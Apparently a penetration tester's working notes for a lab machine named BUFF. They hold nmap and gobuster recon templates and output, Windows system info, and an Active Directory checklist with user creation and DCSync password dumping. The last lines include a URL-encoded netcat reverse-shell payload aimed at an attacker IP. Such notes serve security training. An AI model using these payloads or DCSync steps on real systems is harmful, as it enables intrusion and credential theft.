tmux setenv TARGET $TARGET && export TARGET=$TARGET
tmux setenv attack $attack && export attack=$attack

- tun1
attack=$(ip a show dev tun1 | egrep -o '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}')

- PORTS
TCPports=$(sudo nmap -Pn -p- -T4 $TARGET -oA nmap/TCPports -v | egrep "^[0-9]{2,5}" | sed -E "s#/.*##g" | tr "\n" "," | sed 's/.$//') && echo $TCPports
UDPports=$(sudo nmap -T5 -Pn -sU $TARGET -oA nmap/UDPports -v | egrep "^[0-9]{2,5}" | sed -E "s#/.*##g" | tr "\n" "," | sed 's/.$//') && echo $UDPports

- Basic Services
sudo nmap -Pn -p$TCPports -sS -sV -sC $TARGET -oA nmap/Tserv
sudo nmap -Pn -p$UDPports -sS -sV -sC -sU $TARGET -oA nmap/Userv
-PA: TCP ACK ping

- Basic directory fuzzy
gobuster dir -u http://$TARGET -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x eXt,eXt,eXt -k -o gobuster.txt
png,jpg,config,html,asp,aspx,php,php5,xml,htm,exe

- etc/hosts
sudo sed -i "/$TARGET      domain/d" /etc/hosts
echo "$TARGET      domain" | sudo tee -a /etc/hosts

[] Mount points
[] SMB
[] DNS
[] ftp
[] http enum
    [] folders 
    [] files -x txt,php,html
[] run as admin
[] cron jobs
[] SQL injection
[] Windows suggestor
[] Upload
    [] linpeas
    [] pspy

AD
    [] domain name
    [] find users rpcclient -U "" -N $TARGET
    [] kerberos pre authentication disabled (https://github.com/ropnop/kerbrute/releases/tag/v1.0.3 + getPNusers.py (impatck))
    [] net user /domain
    [] net user username
    [] write privileges writeDACL (Bloodhound/sharphound)
        [] create user + add user to group with writedacl + give dsync privilege + dump passwords
        net user USERNAME PASSWORD /add /domain
        net group "GROUP NAME" /add USERNAME
        pass + cred + Add-ObjectACL -PrincipalIdentity USER -Credential -Rights DCSync

How many ports?

Versions?

Paths of URL?

Known CVE

Not shown: 65533 filtered tcp ports (no-response)
PORT     STATE SERVICE
7680/tcp open  pando-pub
8080/tcp open  http-proxy

PORT     STATE    SERVICE   VERSION
7680/tcp filtered pando-pub
8080/tcp open     http      Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-title: mrb3n's Bro Hut
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION

/img                  (Status: 301) [Size: 343] [--> http://10.129.25.107:8080/img/]
/home.php             (Status: 200) [Size: 143]                                     
/index.php            (Status: 200) [Size: 4969]                                    
/contact.php          (Status: 200) [Size: 4169]                                    
/about.php            (Status: 200) [Size: 5337]                                    
/profile              (Status: 301) [Size: 347] [--> http://10.129.25.107:8080/profile/]
/register.php         (Status: 200) [Size: 137]                                         
/feedback.php         (Status: 200) [Size: 4252]                                        
/Home.php             (Status: 200) [Size: 143]   
/upload               (Status: 301) [Size: 346] [--> http://10.129.25.107:8080/upload/] 
/upload.php           (Status: 200) [Size: 107]                                         
/Contact.php          (Status: 200) [Size: 4169]                                        
/About.php            (Status: 200) [Size: 5337]                                        
/edit.php             (Status: 200) [Size: 4282]                                        
/license              (Status: 200) [Size: 18025]                                       
/Index.php            (Status: 200) [Size: 4969]                                        
/up.php               (Status: 200) [Size: 209]                                         
/packages.php         (Status: 200) [Size: 7791]                                        
/examples             (Status: 503) [Size: 1059]                                        
/include              (Status: 301) [Size: 347] [--> http://10.129.25.107:8080/include/]
/licenses             (Status: 403) [Size: 1204]                                        
/facilities.php       (Status: 200) [Size: 5961]                                        
/Register.php         (Status: 200) [Size: 137]                                         
/Profile              (Status: 301) [Size: 347] [--> http://10.129.25.107:8080/Profile/]
/LICENSE              (Status: 200) [Size: 18025]                                       
/Feedback.php         (Status: 200) [Size: 4252]                                        
/att                  (Status: 301) [Size: 343] [--> http://10.129.25.107:8080/att/]    
/att.php              (Status: 200) [Size: 816]                                         
/%20                  (Status: 403) [Size: 1045]                                        
/IMG                  (Status: 301) [Size: 343] [--> http://10.129.25.107:8080/IMG/]    
/INDEX.php            (Status: 200) [Size: 4969]                                        
/License              (Status: 200) [Size: 18025]                                       
/ex                   (Status: 301) [Size: 342] [--> http://10.129.25.107:8080/ex/]   
/*checkout*.php       (Status: 403) [Size: 1045]                                        
/*checkout*           (Status: 403) [Size: 1045]                                        
/Img                  (Status: 301) [Size: 343] [--> http://10.129.25.107:8080/Img/]    
/boot                 (Status: 301) [Size: 344] [--> http://10.129.25.107:8080/boot/]   
/Upload.php           (Status: 200) [Size: 107]                                         
/Upload               (Status: 301) [Size: 346] [--> http://10.129.25.107:8080/Upload/] 
/phpmyadmin           (Status: 403) [Size: 1204]                                        
/HOME.php             (Status: 200) [Size: 143]                                         
/webalizer            (Status: 403) [Size: 1045]                                        
/*docroot*            (Status: 403) [Size: 1045]                                        
/*docroot*.txt        (Status: 403) [Size: 1045]                                        
/*docroot*.php        (Status: 403) [Size: 1045]                                        
/*                    (Status: 403) [Size: 1045]                                        
/*.php                (Status: 403) [Size: 1045]                                        
/*.txt                (Status: 403) [Size: 1045]                                        
/con                  (Status: 403) [Size: 1045]                                        
/con.txt              (Status: 403) [Size: 1045]                                        
/con.php              (Status: 403) [Size: 1045]                                        
/Packages.php         (Status: 200) [Size: 7791]                                        
/CONTACT.php          (Status: 200) [Size: 4169]                                        
/Edit.php             (Status: 200) [Size: 4282]                                        
/Facilities.php       (Status: 200) [Size: 5961]  



PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State   
============================= ==================================== ========
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled 



Host Name:                 BUFF
OS Name:                   Microsoft Windows 10 Enterprise
OS Version:                10.0.17134 N/A Build 17134
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          shaun
Registered Organization:   
Product ID:                00329-10280-00000-AA218
Original Install Date:     16/06/2020, 14:05:58
System Boot Time:          18/01/2024, 09:20:16
System Manufacturer:       VMware, Inc.
System Model:              VMware7,1
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2394 Mhz
                           [02]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2394 Mhz
BIOS Version:              VMware, Inc. VMW71.00V.21100432.B64.2301110304, 11/01/2023
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume2
System Locale:             en-us;English (United States)
Input Locale:              en-gb;English (United Kingdom)
Time Zone:                 (UTC+00:00) Dublin, Edinburgh, Lisbon, London
Total Physical Memory:     4,095 MB
Available Physical Memory: 2,704 MB
Virtual Memory: Max Size:  4,799 MB
Virtual Memory: Available: 2,898 MB
Virtual Memory: In Use:    1,901 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Ethernet0
                                 DHCP Enabled:    Yes
                                 DHCP Server:     10.129.0.1
                                 IP address(es)
                                 [01]: 10.129.25.107
                                 [02]: fe80::94f:ed65:265a:4507
                                 [03]: dead:beef::14de:4548:a730:681e
                                 [04]: dead:beef::94f:ed65:265a:4507
                                 [05]: dead:beef::19c
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

nc.exe+-e+cmd.exe+10.10.14.220+1234
https://superuser.com/questions/1675599/how-to-make-tunnels-in-linux-without-using-ssh